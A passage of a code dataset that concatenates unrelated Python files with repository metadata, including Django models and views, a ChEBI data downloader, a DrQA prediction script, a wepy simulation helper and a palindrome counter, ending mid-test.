    """A user-authored post.

    ``author`` is nullable with SET_NULL on delete, so posts survive the
    deletion of their author's account.
    """
    author = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, null=True)
    title = models.CharField(max_length=255)
    content = models.TextField()
    created_at = models.DateTimeField(auto_now_add=True)
    edited_at = models.DateTimeField(auto_now=True)

    class Meta:
        db_table = 'posts'
"embedded61@gmail.com"
] | embedded61@gmail.com |
57258779008b8a1bc52126eeb06abb34a183b4e5 | b850aafa66b84b8524cfd87ca6a475cd4d7f48df | /src/bio2bel_chebi/parser/inchis.py | a6a1252d6f077d7d8b260a9316a9bd1ac7e75ecf | [
"MIT"
] | permissive | bio2bel/chebi | 35a738542a6a7ff065a1c95ad8c53e5aa1b63c20 | e73a35cca08441a52117fc159d8f44364b1a8836 | refs/heads/master | 2020-06-26T04:50:09.859382 | 2019-11-13T13:37:25 | 2019-11-13T13:37:25 | 97,003,706 | 0 | 1 | MIT | 2018-11-13T15:40:54 | 2017-07-12T12:13:51 | Python | UTF-8 | Python | false | false | 1,259 | py | # -*- coding: utf-8 -*-
import logging
import os
from urllib.request import urlretrieve
import pandas as pd
from ..constants import INCHIS_DATA_PATH, INCHIS_URL
log = logging.getLogger(__name__)
def download_inchis(force_download=False):
"""Downloads the compound inchis
:param bool force_download: If true, overwrites a previously cached file
:rtype: str
"""
if os.path.exists(INCHIS_DATA_PATH) and not force_download:
log.info('using cached data at %s', INCHIS_DATA_PATH)
else:
log.info('downloading %s to %s', INCHIS_URL, INCHIS_DATA_PATH)
urlretrieve(INCHIS_URL, INCHIS_DATA_PATH)
return INCHIS_DATA_PATH
def get_inchis_df(url=None, cache=True, force_download=False):
"""Gets the compound's inchi keys
:param Optional[str] url: The URL (or file path) to download. Defaults to the ChEBI data.
:param bool cache: If true, the data is downloaded to the file system, else it is loaded from the internet
:param bool force_download: If true, overwrites a previously cached file
:rtype: pandas.DataFrame
"""
if url is None and cache:
url = download_inchis(force_download=force_download)
return pd.read_csv(
url or INCHIS_URL,
sep='\t'
)
| [
"cthoyt@gmail.com"
] | cthoyt@gmail.com |
33c88c043e19e96f7ec08c9b8158b562e0b70726 | 3cd4902b67de144d8e6f36335e125d0548d8cf97 | /tools/detecting/detectron/DetectronDetector.py | d0414990eb597a4ad1c3d6b3ff9435d39727a628 | [
"MIT"
] | permissive | stefantaubert/imageclef-lifelog-2019 | 5d201c2a28f15f608b9b58b94ab2ecddb5201205 | ad49dc79db98a163c5bc282fb179c0f7730546b3 | refs/heads/master | 2022-10-06T12:42:30.011610 | 2022-08-29T13:35:09 | 2022-08-29T13:35:09 | 196,553,184 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,260 | py | import pickle
from src.detecting.DetectorBase import DetectorBase
from src.detecting.img_path_parser import get_paths
from src.io.paths import get_path_detectron
from src.globals import usr1
"""
I run detectron on remote machine and save the results as a dictionary with keys = image_id and values: class predictions.
This dictionary will be loaded as model.
The threshold is set to 0.5
"""
class DetectronDetector(DetectorBase):
    """Detector backed by precomputed Detectron predictions.

    Per the module docstring, Detectron was run on a remote machine and its
    per-image class predictions (threshold 0.5) were pickled as a dict keyed
    by image id; that dict is loaded here instead of running a model locally.
    """

    def __init__(self):
        print("Load predictions from detectron...")
        # NOTE(review): hard-coded path; encoding='latin1' suggests the
        # pickle was written by a Python 2 process — confirm before changing.
        self.predictions = pickle.load(open( "/tmp/pred.pkl", "rb"), encoding='latin1')
        print("Preprocessing...")
        paths = get_paths()
        # NOTE(review): despite its name, this dict maps image *path* ->
        # image *id* (see detect_image below).
        self.ids_to_paths = {}
        for path in paths:
            img_id = path[0]
            img_path = path[1]
            self.ids_to_paths[img_path] = img_id

    def detect_image(self, img):
        """Return the stored predictions for the image at path *img*, or an
        empty list when none were recorded."""
        img_id = self.ids_to_paths[img]
        if img_id in self.predictions:
            r = self.predictions[img_id]
        else:
            r = []
        return r
if __name__ == "__main__":
    # Run detection over all of user 1's images and dump the results to CSV.
    d = DetectronDetector()
    csv = d.detect_images_auto(usr1)
    file_name = get_path_detectron(usr=usr1)
    csv.to_csv(file_name, index=False)
print("Successfully saved to", file_name) | [
"stefan.taubert@posteo.de"
] | stefan.taubert@posteo.de |
df7c68265d10a6433fd2266a5d72fd920abbefbb | 11e8bf1ae982cf4aefcc8f146a7d706e854ea8bb | /royale/urls.py | ca5d0de7fc1b38c336288ea9bf9582a93b0c5b42 | [] | no_license | DK-denno/royalAndRich | d9801a8bb26b915a3c6d0e09e3930f4339ff8c52 | 91e36257ce8ea192ff65c993aab7ea23958dc3c5 | refs/heads/master | 2023-08-26T14:16:13.306965 | 2020-02-20T10:10:42 | 2020-02-20T10:10:42 | 240,218,352 | 0 | 0 | null | 2021-09-22T18:36:12 | 2020-02-13T09:07:42 | CSS | UTF-8 | Python | false | false | 460 | py | from django.urls import path
from django.conf.urls.static import static
from django.conf import settings
from . import views
# URL routes for the royale app; each maps to a view in views.py.
urlpatterns=[
    path(r'',views.index,name="home"),
    path(r'about/',views.about,name='about'),
    path(r'classes/<int:code>/',views.classes,name="classes"),
    path(r'contact/',views.contact,name="contact"),
]
if settings.DEBUG:
urlpatterns+=static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | [
"dennisveer27@gmail.com"
] | dennisveer27@gmail.com |
5dbf192b4ecf8a9c22c3a203e1bcfe82214a1d63 | eacfc0cddb477973a3ca491f35da14b1bda477c3 | /src/wepy_tools/sim_makers/openmm/lennard_jones.py | 4a7c741bdea75a841d2beeb2cc3d469f75dffb90 | [
"MIT"
] | permissive | edeustua/wepy | 933ccb4c15b4a80393700333a04fd01f229e27e3 | f1a2ef5c8cc368d5602c9d683983b3af69a48ce2 | refs/heads/master | 2020-09-29T04:40:55.759360 | 2019-12-06T23:33:11 | 2019-12-06T23:33:11 | 226,952,678 | 0 | 0 | MIT | 2019-12-09T19:40:26 | 2019-12-09T19:40:25 | null | UTF-8 | Python | false | false | 2,492 | py | import numpy as np
from scipy.spatial.distance import euclidean
from wepy.runners.openmm import GET_STATE_KWARG_DEFAULTS
from wepy.resampling.distances.distance import Distance
from wepy.boundary_conditions.receptor import UnbindingBC
from openmmtools.testsystems import LennardJonesPair
from wepy_tools.sim_makers.openmm import OpenMMToolsTestSysSimMaker
## Distance Metric
# we define a simple distance metric for this system, assuming the
# positions are in a 'positions' field
class PairDistance(Distance):
    """Distance metric for a two-particle system: walker states are compared
    by how much their pair separations differ."""

    def __init__(self, metric=euclidean):
        # Pointwise metric used to measure the separation of the pair.
        self.metric = metric

    def image(self, state):
        # The image of a state is simply its 'positions' field.
        return state['positions']

    def image_distance(self, image_a, image_b):
        sep_a = self.metric(image_a[0], image_a[1])
        sep_b = self.metric(image_b[0], image_b[1])
        return np.abs(sep_a - sep_b)
# class PairUnbinding(BoundaryCondition):
# pass
class LennardJonesPairOpenMMSimMaker(OpenMMToolsTestSysSimMaker):
    """Sim maker for the openmmtools Lennard-Jones pair test system, adding
    an unbinding boundary condition between the two particles."""

    TEST_SYS = LennardJonesPair

    # Support the unbinding BC in addition to the base class's BCs.
    BCS = OpenMMToolsTestSysSimMaker.BCS + [UnbindingBC]

    # Particle 0 plays the "ligand", particle 1 the "receptor".
    LIGAND_IDXS = [0]
    RECEPTOR_IDXS = [1]

    UNBINDING_BC_DEFAULTS = {
        'cutoff_distance' : 1.0, # nm
        'periodic' : False,
    }

    # NOTE(review): this aliases the base class's DEFAULT_BC_PARAMS dict and
    # the update() below mutates it in place, affecting the base class and
    # all siblings — consider copying with dict(...) instead.
    DEFAULT_BC_PARAMS = OpenMMToolsTestSysSimMaker.DEFAULT_BC_PARAMS
    DEFAULT_BC_PARAMS.update(
        {
            'UnbindingBC' : UNBINDING_BC_DEFAULTS,
        }
    )

    def make_bc(self, bc_class, bc_params):
        """Instantiate a boundary condition, filling in the extra
        constructor arguments UnbindingBC needs from this sim maker."""
        if bc_class == UnbindingBC:
            bc_params.update(
                {
                    'distance' : self.distance,
                    'initial_state' : self.init_state,
                    'topology' : self.json_top(),
                    'ligand_idxs' : self.LIGAND_IDXS,
                    'receptor_idxs' : self.RECEPTOR_IDXS,
                }
            )
        bc = bc_class(**bc_params)
        return bc

    def __init__(self):
        # must set this here since we need it to generate the state,
        # will get called again in the superclass method
        self.getState_kwargs = dict(GET_STATE_KWARG_DEFAULTS)
        if self.GET_STATE_KWARGS is not None:
            self.getState_kwargs.update(self.GET_STATE_KWARGS)

        test_sys = LennardJonesPair()
        init_state = self.make_state(test_sys.system, test_sys.positions)

        super().__init__(
            distance=PairDistance(),
            init_state=init_state,
            system=test_sys.system,
            topology=test_sys.topology,
        )
| [
"samuel.lotz@salotz.info"
] | samuel.lotz@salotz.info |
31bb29a5c07f4c3feb4ecfe83bfab2823b6a4cfd | 5785d7ed431b024dd910b642f10a6781df50e4aa | /revise-daily/google/educative/dp/8_count_palindromic_substrings.py | 52508c3007719253316bfe8c5f1b6816f8bdfaa4 | [] | no_license | kashyapa/interview-prep | 45d77324446da34d99bf8efedb3544b367b5523e | 7060c090c40602fb9c4778eace2078e1b51e235b | refs/heads/master | 2023-07-28T13:12:49.515299 | 2021-09-06T14:33:25 | 2021-09-06T14:33:25 | 403,706,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py |
def count_palindromic_substrings(s):
    """Count the palindromic substrings of `s` (each occurrence counts).

    Uses expand-around-center: every palindrome is centered on one of the
    2n-1 positions (a character, or the gap between two characters), so
    the count is obtained in O(n^2) time and O(1) extra space.  The
    original implementation sliced and reversed every substring, which
    is O(n^3).
    """
    n = len(s)
    count = 0
    for center in range(2 * n - 1):
        # even centers sit on a character, odd centers on a gap
        left = center // 2
        right = left + center % 2
        while left >= 0 and right < n and s[left] == s[right]:
            count += 1
            left -= 1
            right += 1
    return count
"schandra2@godaddy.com"
] | schandra2@godaddy.com |
86d5c1b6dd0df2f209c9cc42fc7d9348c3668873 | d4442db5a7ab9db2b04fef640a9864f3fba54758 | /test/python/WMComponent_t/JobAccountant_t/fwjrs/genheritagetest.py | 9a7a0a40d5bd27ceeb6ac7e078d5084b139e9fea | [] | no_license | stuartw/WMCore | fa25ff19ab5058a635d35d3c58a0ac56a3e079a1 | 38c39c43f7237fd316930839674ac9be3c0ee8cc | refs/heads/master | 2021-01-18T07:18:18.324604 | 2012-10-18T22:30:34 | 2012-10-18T22:30:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,004 | py | #!/usr/bin/env python
import random
from WMCore.FwkJobReport import Report
from WMCore.DataStructs.Run import Run
from WMCore.Services.UUID import makeUUID
# Generate 25 synthetic framework job reports, each with 50 input files and
# one output file per output module, and pickle them for heritage testing.
outputModules = ["outputModule1", "outputModule2", "outputModule3",
                 "outputModule4", "outputModule5", "outputModule6",
                 "outputModule7", "outputModule8", "outputModule9",
                 "outputModule10"]

# a single run (run 1) with lumi sections 11..40 attached to every file
runInfo = Run(1)
runInfo.lumis.extend([11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24,
                      25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38,
                      39, 40])

totalReports = 25
inputFilesPerReport = 50
# LFNs are numbered continuously across reports (input0, input1, ...)
inputFileCounter = 0

for i in range(totalReports):
    loadTestReport = Report.Report("cmsRun1")
    loadTestReport.addInputSource("PoolSource")

    for j in range(inputFilesPerReport):
        inputFile = loadTestReport.addInputFile("PoolSource", lfn = "input%i" % inputFileCounter,
                                                events = 600000, size = 600000)
        inputFileCounter += 1
        Report.addRunInfoToFile(inputFile, runInfo)

    for outputModule in outputModules:
        loadTestReport.addOutputModule(outputModule)
        # dataset metadata: primary dataset named after the output module
        datasetInfo = {"applicationName": "cmsRun", "applicationVersion": "CMSSW_3_3_5_patch3",
                       "primaryDataset": outputModule, "dataTier": "RAW",
                       "processedDataset": "LoadTest10"}
        # NOTE(review): randrange(1000, 2000, 100000000) has a step larger
        # than the range, so "size" is always 1000 -- confirm whether a
        # varying size was intended.
        fileAttrs = {"lfn": makeUUID(), "location": "cmssrm.fnal.gov",
                     "checksums": {"adler32": "ff810ec3", "cksum": "2212831827"},
                     "events": random.randrange(500, 5000, 50),
                     "merged": True,
                     "size": random.randrange(1000, 2000, 100000000),
                     "module_label": outputModule, "dataset": datasetInfo}
        outputFile = loadTestReport.addOutputFile(outputModule, fileAttrs)
        Report.addRunInfoToFile(outputFile, runInfo)

    # pickle each report next to the script, e.g. HeritageTest00.pkl
    loadTestReport.persist("HeritageTest%02d.pkl" % i)
| [
"metson@4525493e-7705-40b1-a816-d608a930855b"
] | metson@4525493e-7705-40b1-a816-d608a930855b |
420668d0471ddfbafbaf0dad7310591ab306d6a3 | a66b69c3f9da9779ae80f347b61f47e3bc5ba145 | /day1011/listex02.py | b3ea0e6ba188c71120e4efb0096c38079bc66870 | [] | no_license | kyungtae92/python-basic | c841d9c9c6196b01da3de007c1298fe2c4b8f693 | 80a2051e37b6e87c9dbfd332c4b2946089ff0d5c | refs/heads/master | 2020-11-25T08:01:22.156661 | 2019-12-17T08:25:38 | 2019-12-17T08:25:38 | 228,567,120 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 692 | py | # 리스트 문자열에서 인덱스를 이용한 출력
text = "Will is power"
print(text[0], text[3], text[-1])
flist = ["apple", "banana", "tomato", "peach", "pear"]
print(flist[0], flist[3], flist[-1])
# 리스트 또는 문자열에서 슬라이싱에서 원하는 범위만큼 출력
sqr = [0,1,4,9,16,25,35,49]
print(sqr[3:6])
print(sqr[3:])
# 리스트 두개 합치기
marvel = ['스파이더맨', '토르', '아이언맨']
dc = ['슈퍼맨', '베트맨', '아쿠아맨']
heros = marvel + dc # 문자열 합치기
print(heros)
for name in heros:
print(name)
# 리스트를 연속적인 숫자만큼 추가하기
values = [1,2,3] * 3
print(values) | [
"noreply@github.com"
] | kyungtae92.noreply@github.com |
fda51d083f1d95aaab3c9623e46013c49c73c731 | 464d461e2c90724950cae9db0c4b72b55d82aab8 | /jumia/migrations/0008_healthbeautyscrape_kidsfashionscrape_menfashionscrape_womenfashionscrape.py | 3f2670f6ea77d1bac89cbfeb56a8c383c57531a2 | [
"MIT"
] | permissive | Kolaposki/Discoco | 47a1b4dde54612bf7b2adc372fc3ba8950f233af | 0a4d799c19639681e264e2d39f3a1c134d42d573 | refs/heads/master | 2023-05-24T19:46:08.713235 | 2022-07-25T05:32:20 | 2022-07-25T05:32:20 | 233,392,472 | 4 | 3 | null | 2023-05-22T22:40:50 | 2020-01-12T12:55:40 | JavaScript | UTF-8 | Python | false | false | 2,693 | py | # Generated by Django 3.0.1 on 2020-02-07 17:17
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: adds four scraped-deal tables (health & beauty,
    kids/men/women fashion), all sharing the same column layout."""

    dependencies = [
        ('jumia', '0007_electronicsscrape_fashionscrape'),
    ]

    operations = [
        # All four models below are identical in shape: discount percent,
        # product name, current/old price, and unique product URL.
        migrations.CreateModel(
            name='HealthBeautyScrape',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('percent', models.IntegerField()),
                ('product', models.CharField(max_length=200)),
                ('price', models.CharField(max_length=10)),
                ('old_price', models.CharField(max_length=10)),
                ('product_url', models.URLField(max_length=300, unique=True)),
                ('img_url', models.URLField(max_length=300)),
            ],
        ),
        migrations.CreateModel(
            name='KidsFashionScrape',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('percent', models.IntegerField()),
                ('product', models.CharField(max_length=200)),
                ('price', models.CharField(max_length=10)),
                ('old_price', models.CharField(max_length=10)),
                ('product_url', models.URLField(max_length=300, unique=True)),
                ('img_url', models.URLField(max_length=300)),
            ],
        ),
        migrations.CreateModel(
            name='MenFashionScrape',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('percent', models.IntegerField()),
                ('product', models.CharField(max_length=200)),
                ('price', models.CharField(max_length=10)),
                ('old_price', models.CharField(max_length=10)),
                ('product_url', models.URLField(max_length=300, unique=True)),
                ('img_url', models.URLField(max_length=300)),
            ],
        ),
        migrations.CreateModel(
            name='WomenFashionScrape',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('percent', models.IntegerField()),
                ('product', models.CharField(max_length=200)),
                ('price', models.CharField(max_length=10)),
                ('old_price', models.CharField(max_length=10)),
                ('product_url', models.URLField(max_length=300, unique=True)),
                ('img_url', models.URLField(max_length=300)),
            ],
        ),
    ]
| [
"oshodikolapo@gmail.com"
] | oshodikolapo@gmail.com |
8cf61bd51098673db4e399337ad6541fee589be4 | 3973fa32d968b7ab2d1c8da29bffd2d1544151d3 | /scripts/pipeline/predict.py | 68aca425ac4f576611a9ed3afee48f71468e8091 | [
"BSD-3-Clause"
] | permissive | SBUNetSys/DeQA | 638e2fa21013bda5f254c75eb492418f4764d2c9 | 5baf2e151b8230dde3147d2a1e216a3e434375bb | refs/heads/master | 2020-06-19T21:18:07.047544 | 2019-07-14T19:48:00 | 2019-07-14T19:48:00 | 196,876,581 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,422 | py | #!/usr/bin/env python3
# Copyright 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
"""Run predictions using the full DrQA retriever-reader pipeline."""
import argparse
import json
import logging
import os
import sys
import time
import torch
from drqa import pipeline, retriever, DATA_DIR
# Root logger: timestamped INFO messages to stdout for the whole run.
logger = logging.getLogger()
logger.setLevel(logging.INFO)
fmt = logging.Formatter('%(asctime)s.%(msecs)03d: [ %(message)s ]', '%m/%d/%Y_%H:%M:%S')
console = logging.StreamHandler()
console.setFormatter(fmt)
logger.addHandler(console)
# Command-line interface for the retriever-reader prediction run.
parser = argparse.ArgumentParser()
parser.add_argument('dataset', type=str)
parser.add_argument('--out-file', type=str, default=None,
                    help="path to write prediction file")
parser.add_argument('--reader-model', type=str, default=None,
                    help="Path to trained Document Reader model")
parser.add_argument('--normalize', action='store_true', help="Use normalized answer score")
parser.add_argument('--retriever-model', type=str, default=None,
                    help="Path to Document Retriever model (tfidf)")
parser.add_argument('--db_path', type=str, default=None,
                    help='Path to Document DB or index')
parser.add_argument('--n_docs', type=int, default=150,
                    help="Number of docs to retrieve per query")
parser.add_argument('--top_n', type=int, default=150,
                    help="Number of predictions to make per query")
parser.add_argument('--tokenizer', type=str, default='corenlp',
                    help=("String option specifying tokenizer type to use "
                          "(e.g. 'corenlp')"))
parser.add_argument('--no-cuda', action='store_true', help="Use CPU only")
parser.add_argument('--gpu', type=int, default=0,
                    help="Specify GPU device id to use")
parser.add_argument('--parallel', action='store_true',
                    help='Use data parallel (split across gpus)')
parser.add_argument('--num-workers', type=int, default=None,
                    help='Number of CPU processes (for tokenizing, etc)')
parser.add_argument('--batch-size', type=int, default=128,
                    help='Document paragraph batching size')
parser.add_argument('--predict-batch-size', type=int, default=1,
                    help='Question batching size')
parser.add_argument('--ranker', type=str, default='lucene')
parser.add_argument('--et_threshold', type=float, default=None,
                    help='early stopping threshold')
parser.add_argument('--et_model', type=str, default=None,
                    help='early stopping model')
parser.add_argument("-v", "--verbose", help="log more debug info", action="store_true")
args = parser.parse_args()
if args.verbose:
    logger.setLevel(logging.DEBUG)
t0 = time.time()
# log_filename = ('_'.join(sys.argv) + time.strftime("%Y%m%d-%H%M%S")).replace('/', '_')
# logfile = logging.FileHandler('/tmp/%s.log' % log_filename, 'w')
# logfile.setFormatter(fmt)
# logger.addHandler(logfile)
logger.info('COMMAND: python %s' % ' '.join(sys.argv))
# CUDA is used unless explicitly disabled or unavailable
args.cuda = not args.no_cuda and torch.cuda.is_available()
if args.cuda:
    torch.cuda.set_device(args.gpu)
    logger.info('CUDA enabled (GPU %d)' % args.gpu)
else:
    logger.info('Running on CPU only.')

# Ranker selection by first letter of --ranker: 's*' -> sql, 'l*' -> lucene,
# anything else -> tfidf (which also needs --retriever-model).
if args.ranker.lower().startswith('s'):
    ranker = retriever.get_class('sql')(db_path=args.db_path)
elif args.ranker.lower().startswith('l'):
    ranker = retriever.get_class('lucene')(index_path=args.db_path)
else:
    ranker = retriever.get_class('tfidf')(tfidf_path=args.retriever_model, db_path=args.db_path)

logger.info('Initializing pipeline...')
DrQA = pipeline.DrQA(
    reader_model=args.reader_model,
    normalize=args.normalize,
    tokenizer=args.tokenizer,
    batch_size=args.batch_size,
    cuda=args.cuda,
    data_parallel=args.parallel,
    ranker=ranker,
    num_workers=args.num_workers,
    et_model=args.et_model,
    et_threshold=args.et_threshold
)

# ------------------------------------------------------------------------------
# Read in dataset and make predictions
# ------------------------------------------------------------------------------

# dataset is JSON-lines; one {"question": ...} object per line
logger.info('Loading queries from %s' % args.dataset)
queries = []
for line in open(args.dataset):
    data = json.loads(line)
    queries.append(data['question'])

model_name = os.path.splitext(os.path.basename(args.reader_model or 'default'))[0]
data_name = os.path.splitext(os.path.basename(args.dataset))[0]
outfile = args.out_file or os.path.join(DATA_DIR, '{}-{}.predictions.txt'.format(data_name, model_name))
out_dir = os.path.dirname(outfile)
os.makedirs(out_dir, exist_ok=True)
logger.info('Writing results to %s' % outfile)
with open(outfile, 'w') as f:
    batches = [queries[i: i + args.predict_batch_size]
               for i in range(0, len(queries), args.predict_batch_size)]
    for i, batch in enumerate(batches):
        batch_info = '-' * 5 + ' Batch %d/%d ' % (i + 1, len(batches)) + '-' * 5 + ' '
        # NOTE(review): queries[i] is the batch's first query only when
        # --predict-batch-size is 1; for larger batches this logs the
        # wrong query (batch i starts at i * batch_size).
        start_query = queries[i]
        logger.info(batch_info + start_query)
        predictions = DrQA.process(batch, n_docs=args.n_docs, top_n=args.top_n)
        for p in predictions:
            # one JSON line per question, answers sorted by doc_score
            p = sorted(p, key=lambda k: k['doc_score'], reverse=True)
            f.write(json.dumps(p) + '\n')
logger.info('Total time: %.4f' % (time.time() - t0))
| [
"qqcao.cs@gmail.com"
] | qqcao.cs@gmail.com |
966807e614ac6bbe170a8ae017f3233ee5378d41 | 8130c34d546c323d6d5d2ca6b4a67330af08828f | /.history/menu_app/views_20210104163425.py | 0d705d9f471965254e8ff1766b6e951f8ca7ff08 | [] | no_license | lienusrob/final | ba2dad086fc97b21b537ef12df834dfadd222943 | f2726e31f1d51450e4aed8c74021c33679957b28 | refs/heads/master | 2023-02-15T01:36:54.463034 | 2021-01-07T12:47:05 | 2021-01-07T12:47:05 | 327,279,792 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,003 | py |
from .models import Cart, CartItem, MenuItem, ItemsCategory, Order, Orders, generate_order_id, Extras
from account_app.models import Profile
from .forms import AddToCartForm
from django.views.generic import ListView
from django.shortcuts import render, get_object_or_404, redirect
from django.urls import reverse
from django.utils import timezone
class MenuListView(ListView):
    """Class-based list view over all menu items.

    NOTE(review): uses the 'items/' template prefix while the
    function-based views below use 'menu_app/' -- confirm which template
    directory actually exists.
    """
    model = MenuItem
    # template under the 'items/' prefix
    template_name = 'items/menu_list.html'
def menu_list_view(request):
    """Render the full menu plus the category lists for nav and side nav."""
    items = MenuItem.objects.all()
    context = {
        'item_list': items,
        'item_categories': reversed(ItemsCategory.objects.all()),
        'item_categories_side_nav': reversed(ItemsCategory.objects.all()),
    }
    return render(request, 'menu_app/menu_list.html', context)
def home(request):
    """Render the homepage with every item category."""
    return render(request, 'homepage.html', {'category_menu': ItemsCategory.objects.all()})
def menu_item_detail(request, **kwargs):
    """Render the detail page for a single menu item.

    Looks the item up by the 'pk' keyword argument; when no such item
    exists, renders with item=None rather than raising 404.
    """
    item_pk = kwargs.get('pk')
    item = MenuItem.objects.filter(id=item_pk).first()
    return render(request, 'menu_app/item_details.html', {'item': item})
def new_order_info(request):
    """Show (creating it first if needed) the user's open order."""
    profile = get_object_or_404(Profile, user=request.user)
    order, created = Order.objects.get_or_create(customer=profile.user, is_ordered=False)
    if created:
        # a brand-new order gets a fresh reference code
        order.ref_code = generate_order_id()
        order.save()
    return render(request, 'items/order_info.html', {'order': order})
def cart (request):
    # NOTE(review): dead code -- this definition is shadowed by the second
    # `cart` view defined further down in this module, which is the one
    # Python actually keeps.  Consider deleting this copy.
    cart = Cart.objects.get(user = request.user, current = True)
    cart_items = CartItem.objects.filter(cart = cart)
    context = {'cart_items':cart_items}
    return render (request, 'menu_app/cart.html', context )
def menu_details(request, name):
    """List the items of one category; on POST, add the submitted item to
    the user's current cart.

    Raises ItemsCategory.DoesNotExist when `name` matches no category.
    """
    category = ItemsCategory.objects.get(name=name)
    menu_details = MenuItem.objects.filter(category=category)
    context = {'menu_details': menu_details, 'category': name, 'user': request.user}
    if request.method == "POST":
        form = AddToCartForm(request.POST or None)
        # BUGFIX: get_or_create returns an (object, created) tuple; the
        # original assigned the whole tuple to form.cart.
        form.cart, _ = Cart.objects.get_or_create(user=request.user, current=True)
        # NOTE(review): form.save() is called without form.is_valid() --
        # confirm AddToCartForm tolerates that, or add a validity check.
        form.save()
        # messages.success(request, "Item" "added to cart successfully!, please go to cart and check for items.")
    return render(request, 'menu_app/menu_list.html', context)
def cart(request):
    """Render the user's current cart with its items and available extras."""
    current_cart = Cart.objects.get(user=request.user, current=True)
    context = {
        'cart_items': CartItem.objects.filter(cart=current_cart),
        'extras': Extras.objects.all(),
    }
    return render(request, 'menu_app/cart.html', context)
def view_cart(request):
    """A View that renders the session-based cart contents page."""
    return render(request, "cart.html")
def add_to_cart(request, id):
    """Add a quantity of the specified product to the session cart."""
    quantity = int(request.POST.get('quantity'))
    cart = request.session.get('cart', {})
    # Same result whether or not the product is already present: existing
    # quantity (default 0) plus the newly requested quantity.
    cart[id] = int(cart.get(id, 0)) + quantity
    request.session['cart'] = cart
    return redirect('homepage')
def adjust_cart(request, id):
    """Set the session-cart quantity for a product, removing it at zero."""
    quantity = int(request.POST.get('quantity'))
    cart = request.session.get('cart', {})
    if quantity <= 0:
        # KeyError if the product is not in the cart, matching the
        # original behavior
        cart.pop(id)
    else:
        cart[id] = quantity
    request.session['cart'] = cart
    return redirect('view_cart')
def orders(request):
    """Finalize the user's current cart into an order on POST.

    On POST: closes the current cart, wraps it in an Orders record, and
    starts a fresh empty cart for the user.  On GET no order exists, so
    'order' is rendered as None (the original raised NameError here).
    """
    cart = Cart.objects.get(user=request.user, current=True)
    # BUGFIX: the original lookup used the invalid 'cart__pk__' keyword,
    # which raises FieldError at query time.  (Result is currently unused;
    # querysets are lazy so it costs nothing.)
    cart_items = CartItem.objects.filter(cart__pk=cart.pk)
    new_order = None
    if request.method == "POST":
        # BUGFIX: 'cart.current == False' was a comparison, not an
        # assignment, so carts were never actually closed.  The original
        # also looped over request.POST only to skip the (misspelled)
        # 'csrfmiddleweartoken' key -- that loop had no effect and is gone.
        cart.current = False
        cart.date_ordered = timezone.now()
        cart.save()
        new_order = Orders(cart=cart)
        new_order.save()
        # start a fresh cart for the next purchases
        cart = Cart(user=request.user)
        cart.save()
    context = {'order': new_order}
    return render(request, 'order_info.html', context)
| [
"lienus.rob@hotmail.de"
] | lienus.rob@hotmail.de |
e0650e53f4315a7ace0c0cd4c087506a4d2f209d | 1ff265ac6bdf43f5a859f357312dd3ff788804a6 | /lab_18_if_challenge.py | f421762b2c086de477f11ec2eed7e78cbab95eec | [] | no_license | sgriffith3/july_pyb | f1f493450ab4933a4443518863f772ad54865c26 | 5e06012ad436071416b95613ed46e972c46b0ff7 | refs/heads/master | 2022-11-19T04:58:41.632000 | 2020-07-17T19:46:44 | 2020-07-17T19:46:44 | 279,335,603 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 663 | py | # Hurricane Rating System
import random
storm = random.randint(1, 200)
print(storm)
# Five 157 or greater
if storm >= 157:
print("Cat 5")
# Four 130 to 156
elif storm >= 130:
print("Cat 4")
# Three 111 to 129
elif storm >= 111:
print("Cat 3")
# Two 96 to 110
elif storm >= 96:
print("Cat 2")
# One 74 to 95
elif storm >= 74:
print("Cat 1")
# Tropical Storm 39 to 73
elif storm >= 39:
print("Tropical Storm")
# Tropical Depression less than or equal to 38
else:
print("Tropical Depression")
if storm <= 157 and storm >= 74:
print("Cat 1, 2, 3, or 4")
elif storm >= 157 or storm <= 74:
print("Its not a Cat 1, 2, 3, or 4")
| [
"sgriffith@alta3.com"
] | sgriffith@alta3.com |
e8e1ffe845d61c38aad005af58ab3b94ba501715 | b227199eda4f1e894199c8a8f5e87c39df83af45 | /examples/tdd/tests/functional/test_users.py | 4160a2ee094794a0b20cd67104ddd644ad404cbb | [] | no_license | gabrielfalcao/tumbler | c8d67a8bfd4555ff0fe04f984017620ee320fe7f | 322976083b2c76286f98dcad445eb22b7665f24f | refs/heads/master | 2021-01-20T05:53:47.780517 | 2015-06-24T19:32:58 | 2015-06-24T19:32:58 | 29,232,813 | 3 | 0 | null | 2019-12-20T17:20:26 | 2015-01-14T07:33:42 | Python | UTF-8 | Python | false | false | 788 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
from sure import scenario
from datetime import datetime
from freezegun import freeze_time
from tumbler.core import Web
from timeless.models import User
def prepare_db(context):
    """Scenario setup: build a Web app, wire its models and create tables."""
    context.web = Web()
    context.web.prepare_models()
    context.web.db.create_all()
def cleanup_db(context):
    """Scenario teardown: drop every table created by prepare_db."""
    context.web.db.drop_all()
@freeze_time("2005-01-01")
@scenario(prepare_db, cleanup_db)
def test_create_user(context):
    ('Creating a user should work')

    # The frozen clock makes date_added deterministic below.
    result = User.create(
        email=u'bar@bar.com',
        password='foobar'
    )

    # NOTE(review): the password round-trips in plain text -- confirm
    # whether User.create is expected to hash it.
    result.to_dict().should.equal({
